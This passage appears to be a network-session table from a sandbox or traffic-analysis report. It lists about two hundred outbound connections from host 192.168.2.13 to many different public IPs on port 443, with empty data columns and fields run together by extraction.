                                                  12832192.168.2.134132662.150.1.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12833192.168.2.1339742115.226.109.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12834192.168.2.134821239.176.227.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12835192.168.2.1343044197.177.254.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12836192.168.2.135543437.134.32.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12837192.168.2.1356682188.83.245.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12838192.168.2.135572695.144.137.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12839192.168.2.1357886195.135.117.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12840192.168.2.1349938210.36.212.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12841192.168.2.1359006117.60.115.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12842192.168.2.133278882.119.22.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12843192.168.2.13536209.185.57.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12844192.168.2.135824642.75.64.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12845192.168.2.134424650.69.1.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12846192.168.2.134164092.125.56.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12847192.168.2.135718290.222.66.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12848192.168.2.1339050141.85.205.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12849192.168.2.135674285.28.220.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12850192.168.2.1347794187.254.39.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12851192.168.2.1344088190.122.149.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12852192.168.2.135379669.229.38.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12853192.168.2.1350550119.223.127.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12854192.168.2.133619450.117.121.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12855192.168.2.133736639.30.248.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12856192.168.2.1334694105.168.50.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12857192.168.2.135313895.43.177.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12858192.168.2.1350920113.56.45.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12859192.168.2.1351716195.221.246.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12860192.168.2.135262413.1.254.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12861192.168.2.1353614202.37.41.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12862192.168.2.133294663.141.232.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12863192.168.2.1360834105.20.148.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12864192.168.2.1350980121.19.87.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12865192.168.2.1358938140.57.254.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12866192.168.2.133619493.243.110.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12867192.168.2.1355410213.28.21.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12868192.168.2.134713023.168.44.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12869192.168.2.1350136141.103.67.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12870192.168.2.133381094.142.244.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12871192.168.2.13398069.209.141.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12872192.168.2.134342819.219.125.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12873192.168.2.1355796199.241.82.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12874192.168.2.135960652.77.65.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12875192.168.2.1341406153.222.80.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12876192.168.2.1359746203.3.103.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12877192.168.2.1341100185.203.83.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12878192.168.2.1350770120.179.50.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12879192.168.2.1339396195.111.141.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12880192.168.2.1350382198.0.18.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12881192.168.2.1341390162.133.232.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12882192.168.2.133704874.37.49.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12883192.168.2.1340800189.57.159.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12884192.168.2.1342556112.227.122.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12885192.168.2.1350898211.52.230.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12886192.168.2.134143035.119.165.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12887192.168.2.1337552151.18.251.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12888192.168.2.133934673.180.214.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12889192.168.2.1353342106.206.252.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12890192.168.2.1349124148.111.134.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12891192.168.2.134198637.148.248.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12892192.168.2.1336490151.231.129.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12893192.168.2.1348104184.168.198.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12894192.168.2.134190443.239.131.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12895192.168.2.1357320142.11.35.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12896192.168.2.135793412.111.101.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12897192.168.2.1360628162.11.110.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12898192.168.2.1345060168.33.86.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12899192.168.2.1338402206.21.219.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12900192.168.2.1349604200.213.210.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12901192.168.2.1345760183.182.145.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12902192.168.2.1348450206.243.144.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12903192.168.2.133765467.31.150.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12904192.168.2.1335976210.155.179.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12905192.168.2.133656217.139.225.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12906192.168.2.1354630207.177.185.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12907192.168.2.1343618203.3.79.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12908192.168.2.133420831.111.80.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12909192.168.2.1350354161.167.253.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12910192.168.2.1339974107.226.79.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12911192.168.2.1345902130.110.208.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12912192.168.2.134966467.47.28.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12913192.168.2.1333712171.241.183.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12914192.168.2.1337202168.39.112.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12915192.168.2.1333604189.35.72.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12916192.168.2.1345496133.228.174.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12917192.168.2.135469683.216.171.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12918192.168.2.133376846.66.225.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12919192.168.2.133749678.238.155.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12920192.168.2.135753085.129.35.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12921192.168.2.134859612.211.177.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12922192.168.2.136066437.239.240.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12923192.168.2.1334156145.96.207.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12924192.168.2.1342476111.64.194.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12925192.168.2.133551027.6.59.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12926192.168.2.1359444101.111.77.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12927192.168.2.134312212.98.208.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12928192.168.2.133391098.236.254.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12929192.168.2.135143459.166.188.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12930192.168.2.135126439.30.217.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12931192.168.2.13334508.42.205.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12932192.168.2.1333292191.241.37.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12933192.168.2.135868463.18.130.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12934192.168.2.1335132126.241.3.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12935192.168.2.133638687.27.91.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12936192.168.2.1339542110.22.15.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12937192.168.2.133657875.65.217.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12938192.168.2.1353814176.225.54.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12939192.168.2.1356934131.190.47.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12940192.168.2.1334434211.235.24.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12941192.168.2.1337636151.138.203.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12942192.168.2.133637668.1.218.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12943192.168.2.1336324146.224.44.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12944192.168.2.133830259.85.161.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12945192.168.2.135629072.93.254.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12946192.168.2.1358162180.247.107.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12947192.168.2.134416018.117.35.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12948192.168.2.1354326129.132.81.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12949192.168.2.1352934153.159.190.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12950192.168.2.1344006184.234.128.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12951192.168.2.1345210122.234.157.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12952192.168.2.1345434107.110.184.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12953192.168.2.135634240.230.168.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12954192.168.2.133698873.196.197.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12955192.168.2.135955449.236.203.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12956192.168.2.1350080102.201.242.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12957192.168.2.1341000186.154.179.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12958192.168.2.1333544147.52.214.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12959192.168.2.135478877.30.175.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12960192.168.2.1340318107.214.243.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12961192.168.2.1350646148.162.206.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12962192.168.2.134344092.110.14.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12963192.168.2.1338846153.62.54.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12964192.168.2.1356402158.218.0.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12965192.168.2.1338960152.232.216.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12966192.168.2.1345666105.238.153.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12967192.168.2.134271253.76.100.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12968192.168.2.1333072203.49.148.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12969192.168.2.1342744208.222.55.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12970192.168.2.134183837.120.19.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12971192.168.2.13420944.3.224.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12972192.168.2.134191019.138.231.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12973192.168.2.1333380201.239.123.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12974192.168.2.134650466.105.131.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12975192.168.2.135327693.69.22.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12976192.168.2.133582434.127.247.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12977192.168.2.134220093.223.78.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12978192.168.2.136033438.91.110.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12979192.168.2.1357102220.36.94.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12980192.168.2.1348310200.207.69.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12981192.168.2.134111263.242.51.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12982192.168.2.1344400131.177.217.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12983192.168.2.1354866132.154.202.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12984192.168.2.135129412.156.25.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12985192.168.2.1354686165.185.219.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12986192.168.2.135078035.224.56.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12987192.168.2.1360982132.213.8.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12988192.168.2.1350512153.128.67.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12989192.168.2.1335700155.226.10.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12990192.168.2.134761078.116.74.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12991192.168.2.133423437.127.215.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12992192.168.2.1354972160.11.115.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12993192.168.2.1343622167.208.138.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12994192.168.2.135289870.225.172.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12995192.168.2.133547232.142.179.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12996192.168.2.1337728158.158.180.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12997192.168.2.135406851.70.116.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12998192.168.2.1357562219.186.187.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12999192.168.2.1351076222.10.33.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13000192.168.2.1342752199.18.209.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13001192.168.2.13509241.15.117.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13002192.168.2.1347728188.34.225.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13003192.168.2.134591224.133.183.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13004192.168.2.1336072150.155.122.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13005192.168.2.135879875.235.183.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13006192.168.2.1355240177.161.244.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13007192.168.2.13366025.229.9.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13008192.168.2.135872257.53.12.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13009192.168.2.134842423.243.246.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13010192.168.2.133593669.24.71.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13011192.168.2.135097046.203.120.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13012192.168.2.134464654.158.27.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13013192.168.2.134769820.74.182.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13014192.168.2.1354836158.201.70.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13015192.168.2.1339842195.57.235.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13016192.168.2.1346328124.132.251.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13017192.168.2.1344798177.175.0.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13018192.168.2.1344182138.75.194.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13019192.168.2.1340684164.112.199.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13020192.168.2.134698045.228.140.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13021192.168.2.135123295.40.224.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13022192.168.2.1336126191.212.91.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13023192.168.2.1360170183.125.36.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13024192.168.2.135310287.17.210.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13025192.168.2.1337616184.24.163.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13026192.168.2.133815064.215.10.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13027192.168.2.1345696209.223.195.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13028192.168.2.1333084180.230.11.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13029192.168.2.134419684.169.83.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13030192.168.2.133290096.195.181.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13031192.168.2.1355346132.32.183.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13032192.168.2.1345976200.170.179.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13033192.168.2.1360830211.208.89.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13034192.168.2.1355692174.59.91.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13035192.168.2.1358170198.194.226.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13036192.168.2.1357406149.147.36.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13037192.168.2.1360760107.118.41.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13038192.168.2.135767297.163.112.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13039192.168.2.1358882204.41.134.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13040192.168.2.1344602171.170.144.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13041192.168.2.1341050169.179.53.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13042192.168.2.133854457.53.138.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13043192.168.2.1344578156.175.132.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13044192.168.2.1345952194.154.179.99443
